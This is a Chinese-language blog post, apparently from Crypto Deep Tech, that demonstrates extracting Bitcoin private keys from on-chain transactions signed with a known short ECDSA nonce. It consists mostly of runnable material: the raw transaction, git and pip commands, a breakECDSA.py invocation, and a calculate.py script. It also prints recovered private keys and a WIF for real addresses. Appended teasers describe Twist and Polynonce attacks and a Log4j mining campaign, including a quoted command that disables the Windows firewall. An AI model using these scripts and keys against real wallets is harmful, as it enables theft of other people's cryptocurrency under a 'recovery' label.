通過 ECDSA 短簽名恢復比特幣錢包

我們都知道，ECDSA 簽名中的秘鑰洩露可以導致比特幣錢包的完全恢復。在我們之前的文章中，我們研究了區塊鏈交易中的弱點和漏洞，但也有 ECDSA 短簽名也導致比特幣錢包的完全恢復。

為什麼這些 ECDSA 簽名被稱為短簽名？

你可以從討論的話題中得到這個問題的答案：“最短的ECDSA簽名”【The shortest ECDSA signature】

在我們的上一篇文章：“使用 ECPy + Google Colab 庫通過標量乘法減少私鑰”中，我們創建了一個Python腳本：maxwell.py，它為我們生成了一個相當有趣的公鑰

(0x3b78ce563f89a0ed9414f5aa28ad0d96d6795f9c63 , 0xc0c686408d517dfd67c2367651380d00d126e4229631fd03f8ff35eef1a61e3c)

我們知道簽名的值，"R"這是從私鑰到公鑰(Nonce)

看看區塊鏈交易：11e6b169701a9047f3ddbb9bc4d4ab1a148c430ba4a5929764e97e76031f4ee3

原始TX：

0100000001afddd5c9f05bd937b24a761606581c0cddd6696e05a25871279f75b7f6cf891f250000005f3c303902153b78ce563f89a0ed9414f5aa28ad0d96d6795f9c6302200a963d693c008f0f8016cfc7861c7f5d8c4e11e11725f8be747bb77d8755f1b8012103151033d660dc0ef657f379065cab49932ce4fb626d92e50d4194e026328af853ffffffff010000000000000000016a00000000

本次交易的規模僅為：156 байт

如何通過 ECDSA 短簽名恢復比特幣錢包？

在比特幣區塊鏈的密碼分析中，我們使用自己的Bas h腳本：btcrecover.sh

Bash 腳本：btcrecover.sh

sudo apt install python2-minimal

wget https://bootstrap.pypa.io/pip/2.7/get-pip.py

sudo python2 get-pip.py

pip2 install -r requirements.txt

chmod +x btcrecover.sh


 ./btcrecover.sh 12yysAMhagEm67QCX85p3WQnTUrqcvYVuk


 ./btcrecover.sh 15HvLBX9auG2bJdLCTxSvjvWvdgsW7BvAT

結果：

| privkey : addr |

讓我們打開 bitaddress 並檢查：

ac8d0abda1d32aaabff56cb72bc39a998a98779632d7fee83ff452a86a849bc1:12yysAMhagEm67QCX85p3WQnTUrqcvYVuk
b6c1238de89e9defea3ea0712e08726e338928ac657c3409ebb93d9a0873797f:15HvLBX9auG2bJdLCTxSvjvWvdgsW7BvAT

讓我們繼續實驗部分，更詳細地分析用於恢復比特幣錢包的所有腳本

打開 [TerminalGoogleColab]。

讓我們使用“09BitcoinWalletRecovery”存儲庫。

git clone https://github.com/demining/CryptoDeepTools.git

cd CryptoDeepTools/09BitcoinWalletRecovery/

ls

安裝所有必要的模塊：

bitcoin
ecdsa
utils
base58

pip2 install -r requirements.txt

使用breakECDSA.py腳本，我們從RawTX簽名 [R, S, Z]

python2 breakECDSA.py 0100000001afddd5c9f05bd937b24a761606581c0cddd6696e05a25871279f75b7f6cf891f250000005f3c303902153b78ce563f89a0ed9414f5aa28ad0d96d6795f9c6302200a963d693c008f0f8016cfc7861c7f5d8c4e11e11725f8be747bb77d8755f1b8012103151033d660dc0ef657f379065cab49932ce4fb626d92e50d4194e026328af853ffffffff010000000000000000016a00000000 > signatures.txt

結果將保存到一個文件中：signatures.txt

讓我們打開文件：PublicKeys.txt

cat signatures.txt

R = 0x00000000000000000000003b78ce563f89a0ed9414f5aa28ad0d96d6795f9c63
S = 0x0a963d693c008f0f8016cfc7861c7f5d8c4e11e11725f8be747bb77d8755f1b8
Z = 0x521a65420faa5386d91b8afcfab68defa02283240b25aeee958b20b36ddcb6de

正如我們從上一篇文章中了解到的，我們知道生成簽名的密鑰 R

在我們的例子中，密鑰是 (Nonce)：

0x7fffffffffffffffffffffffffffffff5d576e7357a4501ddfe92f46681b20a0 --> 0x3b78ce563f89a0ed9414f5aa28ad0d96d6795f9c63, 0x3f3979bf72ae8202983dc989aec7f2ff2ed91bdd69ce02fc0700ca100e59ddf3

簽名：

K = 0x7fffffffffffffffffffffffffffffff5d576e7357a4501ddfe92f46681b20a0
R = 0x00000000000000000000003b78ce563f89a0ed9414f5aa28ad0d96d6795f9c63
S = 0x0a963d693c008f0f8016cfc7861c7f5d8c4e11e11725f8be747bb77d8755f1b8
Z = 0x521a65420faa5386d91b8afcfab68defa02283240b25aeee958b20b36ddcb6de

現在我們知道 ] 的值，[K, R, S, Z我們可以使用公式獲取私鑰並恢復比特幣錢包。

私鑰 = ((((S * K) - Z) * modinv(R,N)) % N)

要獲取私鑰，我們將使用Python腳本：calculate.py

def h(n):
    return hex(n).replace("0x","")

def extended_gcd(aa, bb):
    lastremainder, remainder = abs(aa), abs(bb)
    x, lastx, y, lasty = 0, 1, 1, 0
    while remainder:
        lastremainder, (quotient, remainder) = remainder, divmod(lastremainder, remainder)
        x, lastx = lastx - quotient*x, x
        y, lasty = lasty - quotient*y, y
    return lastremainder, lastx * (-1 if aa < 0 else 1), lasty * (-1 if bb < 0 else 1)

def modinv(a, m):
    g, x, y = extended_gcd(a, m)
    if g != 1:
        raise ValueError
    return x % m
    
N = 0xfffffffffffffffffffffffffffffffebaaedce6af48a03bbfd25e8cd0364141


K = 0x7fffffffffffffffffffffffffffffff5d576e7357a4501ddfe92f46681b20a0
R = 0x00000000000000000000003b78ce563f89a0ed9414f5aa28ad0d96d6795f9c63
S = 0x0a963d693c008f0f8016cfc7861c7f5d8c4e11e11725f8be747bb77d8755f1b8
Z = 0x521a65420faa5386d91b8afcfab68defa02283240b25aeee958b20b36ddcb6de


print (h((((S * K) - Z) * modinv(R,N)) % N))

讓我們運行 Python 腳本：calculate.py

python3 calculate.py

PrivKey = b6c1238de89e9defea3ea0712e08726e338928ac657c3409ebb93d9a0873797f

讓我們打開 bitaddress 並檢查：

ADDR: 15HvLBX9auG2bJdLCTxSvjvWvdgsW7BvAT
WIF:  L3LxjEnwKQMFYNYmCGzM1TqnwxRDi8UyRzQpVfmDvk96fYN44oFG
HEX:  b6c1238de89e9defea3ea0712e08726e338928ac657c3409ebb93d9a0873797f

找到私鑰！

比特幣錢包恢復了！

Короткие подписи ECDSA是丟失硬幣的潛在威脅 BTC，因此我們強烈建議大家始終更新軟件並僅使用經過驗證的設備。

該視頻是為 CRYPTO DEEP TECH門戶網站創建的，以確保橢圓曲線上的數據和密碼學的金融安全性免受加密貨幣中 secp256k1 弱簽名的影響 ECDSABITCOIN

來源

電報： https: //t.me/cryptodeeptech

視頻素材：https://youtu.be/xBgjWE5tA7Y

來源：https://cryptodeep.ru/shortest-ecdsa-signature

密碼分析

Восстановление Биткоин Кошелька через короткие подписи ECDSA

Crypto Deep Tech

Twist Attack 示例 #1 執行一系列 ECC 操作以獲取比特幣錢包私鑰的值

https://www.youtube.com/embed/S_ZUcM2cD8I 不久前，用於標準橢圓曲線的elliptic (6.5.4)包容易受到各種攻擊，其中之一就是Twist Attack。密碼問題出在 secp256k1 的實現中。我們知道比特幣加密貨幣使用的是secp256k1，這次攻擊並沒有繞過比特幣，根據CVE-2020-28498漏洞，ECDSA算法交易的確認方通過secp256k1橢圓曲線上的某些點傳輸部分私鑰值（由 5 到 45 位組成的更簡單的子群）稱為六位扭曲這個過程非常危險，它會在執行一系列 ECC 操作後洩露加密數據。在本文中，我們將通過示例實施扭曲攻擊，並展示如何使用 secp256k1 橢圓曲線上的某些點，我們可以獲得部分私鑰值並使用“Sagemath pollard rho”在 5-15 分鐘內恢復比特幣錢包函數：(discrete_log_rho) ”和“中國剩餘定理”。換句話說，這些特定點是 secp256k1 橢圓曲線上的惡意選擇點 https://github.com/christianlundkvist/blog/blob/master/2020_05_26_secp256k1_twist_attacks/secp256k1_twist_attacks.md 根據 Paulo Barreto 的推文：https://twitter.com/pbarreto/status/825703772382908416 ?s=21 餘因子為3^2*13^2*3319*22639 E1: 20412485227 E2: 3319, 22639 E3: 109903, 12977017, 383229727 E4: 18979 E6: 10903, 5290657, 10833080827, 22921299619447 prod = 20412485227 * 3319 * 22639 *109903 * 12977017 *…

Crypto Deep Tech

POLYNONCE ATTACK使用BITCOIN簽名作為128位任意高次方的多項式來獲取私鑰

加密深度技術 https://www.youtube.com/embed/7nKs_KHtyn4 在本文中，我們將再次觸及主題：“比特幣的嚴重漏洞”，並在所有三個示例中使用 2023 的全新攻擊“POLYNONCE ATTACK”。第一次提到這種攻擊是在“Kudelski Security”的一篇文章中描述的。 https://research.kudelskisecurity.com/2023/03/06/polynonce-a-tale-of-a-novel-ecdsa-attack-and-bitcoin-tears/ 作為實踐基礎，我們將從我們之前的文章“使用自同態加速 secp256k1”中獲取材料，其中Hal Finney LAMBDA 和 BETA的 secp256k1 曲線上的值隱藏了比特幣橢圓曲線的不確定性深度。我們可以透露很多Binary number (4 digits): "1111" // Hex number: "F" // https://www.rapidtables.com/convert/number/hex-to-binary.html 我們也非常清楚由128 位二進制數（4 位）組成的secp256k1曲線的順序：“1111” // 十六進制數：“F” // n = 0xfffffffffffffffffffffffffffffffebaaedce6af48a03bbfd25e8cd0364141 1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111010111010101011101101110011100110101011110100100010100000001110111011111111010010010111101000110011010000001101100100000101000001 我們看到以多項式為單位的二進制碼中任意高次的128位模 Speed up secp256k1 with endomorphism 鑑於這一事實，比特幣私鑰的初始位將是二進制數（4 位）：“1111” // 十六進制數：“F” // 作為理論基礎，我們將採用以下材料： “對比特幣的 Polynonce 攻擊” https://attacksafe.ru/polynonce-attack-on-bitcoin 考慮一個比特幣地址的例子： 1DxzwX4qC9PsWDSazuWbJRzEwdGx3n9CJB 929d565c386a279cf7a0382ba48cab1f72d62e7cfb3ab97b4f211d5673bc4441 原始TX 02000000019e3de154f8b473a796b9e39dd279dff1d907a4d27a1d8b23a055f97b08ad4c6e310000006b483045022100b29bdfc27ddf6bebd0e77c84b31dc1bc64b5b2276c8d4147421e96ef85467e8d02204ddd8ff0ffa19658e3b417be5f64d9c425a4d9fcd76238b8538c1d605b229baf0121027b06fe78e39ced37586c42c9ac38d7b2d88ccdd4cd1bb38816c0933f9b8db695ffffffff0169020000000000001600145fc8e854994406f93ea5c7f3abccc5d319ae2a3100000000 我們去官網看看： https: //colab.research.google.com 選擇選項 “上傳筆記本” 下載文件： POLYNONCE_ATTACK.ipynb 通過實用程序加載HEX數據echo 並將其保存到文件：RawTX.txt !echo '02000000019e3de154f8b473a796b9e39dd279dff1d907a4d27a1d8b23a055f97b08ad4c6e310000006b483045022100b29bdfc27ddf6bebd0e77c84b31dc1bc64b5b2276c8d4147421e96ef85467e8d02204ddd8ff0ffa19658e3b417be5f64d9c425a4d9fcd76238b8538c1d605b229baf0121027b06fe78e39ced37586c42c9ac38d7b2d88ccdd4cd1bb38816c0933f9b8db695ffffffff0169020000000000001600145fc8e854994406f93ea5c7f3abccc5d319ae2a3100000000' >…

Crypto Deep Tech

利用危險的 Log4j 漏洞 CVE-2021-44228 的加密貨幣挖掘代碼中的漏洞

https://www.youtube.com/embed/PNDBjoT83zA Log4j 的背景阿里雲安全團隊公開披露了一個嚴重漏洞（CVE-2021-44228），允許針對多個版本的 Apache Log4j2（Log4Shell）執行未經身份驗證的遠程代碼。攻擊者可以通過任何協議（如 HTTPS）連接並發送特製字符串來利用易受攻擊的服務器。 Log4j 加密貨幣挖礦活動 Darktrace 檢測到由於利用此 Log4j 漏洞而發生的多個客戶部署中的加密挖掘。在所有這些事件中，攻擊都是通過出站 SSL 連接進行的，這些連接似乎是請求 base64 編碼的 PowerShell 腳本繞過邊界防禦和下載批處理 (.bat) 腳本文件，以及安裝加密挖掘惡意軟件的多個可執行文件。該活動具有更廣泛的活動指標，包括常見的硬編碼 IP、可執行文件和腳本。攻擊週期開始於似乎是對互聯網連接設備的機會性掃描，以尋找易受 Log4j 攻擊的 VMWare Horizons 服務器。一旦發現易受攻擊的服務器，攻擊者就會與受害者建立 HTTP 和 SSL 連接。成功利用後，服務器在端口 1389 上執行回調，檢索名為 mad_micky.bat 的腳本。這實現了以下目標：通過將所有配置文件設置為 state=off'netsh advfirewall set allprofiles state off' 來禁用 Windows 防火牆使用'netstat -ano | 搜索指示其他礦工安裝的現有進程 findstr TCP' 識別在端口 :3333, :4444, :5555, :7777, :9000…

«CRYPTO DEEP TECH»

通過 ECDSA 短簽名恢復比特幣錢包

為什麼這些 ECDSA 簽名被稱為短簽名？

原始TX：

如何通過 ECDSA 短簽名恢復比特幣錢包？

Bash 腳本：btcrecover.sh

結果：

讓我們繼續實驗部分，更詳細地分析用於恢復比特幣錢包的所有腳本

安裝所有必要的模塊：

結果將保存到一個文件中：signatures.txt

簽名：

讓我們運行 Python 腳本：calculate.py

Related Posts

Crypto Deep Tech